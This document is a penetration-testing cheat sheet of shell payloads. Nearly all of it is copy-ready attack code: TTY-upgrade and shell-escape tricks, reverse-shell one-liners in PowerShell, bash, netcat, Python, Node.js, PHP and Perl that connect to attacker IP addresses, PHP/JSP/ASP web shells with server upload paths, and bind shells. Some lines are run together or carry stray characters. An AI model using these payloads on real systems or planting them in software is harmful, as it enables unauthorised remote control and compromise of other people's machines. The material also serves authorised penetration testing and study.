Table of Contents
Online Generator: https://www.revshells.com/ or check out my tool at https://tools.ranevillanueva.com/revshells
Spawn Interactive Shell
/usr/bin/script -qc /bin/bash /dev/null- python
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xterm
### CTRL+Z
stty raw -echo; fg- bash
script /dev/null -c bash
### CTRL+Z
stty raw -echo; fg###Terminal type? screen- sh
/bin/sh -i- If the shell does not cover the entire terminal
# Display TERM variableecho $TERM# OUTPUT: xterm-256color
# Display row and column sizestty size# OUTPUT: 67 318
export TERM=xterm-256colorstty rows 67 columns 318Spawn Shell
perl
perl —e 'exec "/bin/sh";'# OR## Run from a scriptperl: exec "/bin/sh";Ruby
## Run from a scriptruby: exec "/bin/sh"Lua
-- Run from a scriptlua: os.execute('/bin/sh')AWK
awk 'BEGIN {system("/bin/sh")}'Find
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;# ORfind . -exec /bin/sh \; -quitVIM
vim -c ':!/bin/sh'Vim Escape
vim:set shell=/bin/sh:shellReverse Shell
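- The process is to start a netcat listener on the attacker machine; the reverse shell run on the victim then connects out to that listener. Because the connection is outbound from the victim, egress filtering and alerting on interpreters or shells whose stdin/stdout are bound to a network socket are the usual places to catch it.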
Powershell
Oneliner
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Bash
Oneliner
bash -c "bash -i >& /dev/tcp/10.10.16.10/1337 0>&1"echo 'bash -i >& /dev/tcp/10.10.16.10/1337 0>&1' | bashrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
file
#!/bin/bashbash -i >& /dev/tcp/10.10.16.10/1338 0>&1Netcat
Oneliner
/bin/nc -nv 192.168.45.218 9090 -e /bin/bash
Python
Oneliner
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Multiline
import socketimport subprocessimport os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.49.51",9090))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"]);'Advanced
().__class__.__base__.__subclasses__()[317](["/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.165/1337 0>&1"])- Alternative to import - show subclasses
print(().__class__.__base__.__subclasses__())
- Alternative to import - show subclasses
Node.js
Oneliner
echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js
Payload
require("child_process").exec("nc -nv 192.168.49.51 9090 -e /bin/bash");PHP
Oneliner
php -r "system("bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'");"- or
php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");" -
Note: when the command is sent in a URL, percent-encode all special characters inside the single quotes (including the single quotes themselves).
php%20-r%20%22system(%5C%22bash%20-c%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E45%2E218%2F9090%200%3E%261%27%5C%22);%22
- or
php -r '$sock=fsockopen("192.168.49.51",9090);exec("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("192.168.49.51",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("192.168.49.51",9090);system("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("192.168.49.51",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("192.168.49.51",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Perl
Oneliner
perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Multiline
use Socket;$i="192.168.49.51";$p=9090;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))) { open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");}Web Shell
- Where to upload web shells:
  - Apache - /var/www/html/
  - Nginx - /usr/local/nginx/html
  - IIS - c:\inetpub\wwwroot\
  - XAMPP - c:\xampp\htdocs\
PHP
<?php system($_GET["cmd"]); ?>
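To use, pass the command in the cmd URL parameter: http://example.com/shell.php?cmd=ls (with GET the command is part of the request URL, so it is typically recorded in the web server's access log).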
JSP
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
ASP
<% eval request("cmd") %>
Writing from shell to a file
echo "<pre><?php passthru(\$_GET['cmd']); ?></pre>" > /var/www/html/webshell.php
Bind Shell
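- The process is to establish a listener on the victim machine (the bind shell itself); the attacker then connects to that listener. The one-liners below do no authentication, so anyone who can reach the port gets the same shell, and the extra listening port is visible in the host's socket listing.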
Bash
Oneliner
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
Python
Oneliner
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
Powershell
Oneliner
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
Changelog
| Date | Details |
|---|---|
| 2026 Apr 01 | Added tools.ranevillanueva.com/shells |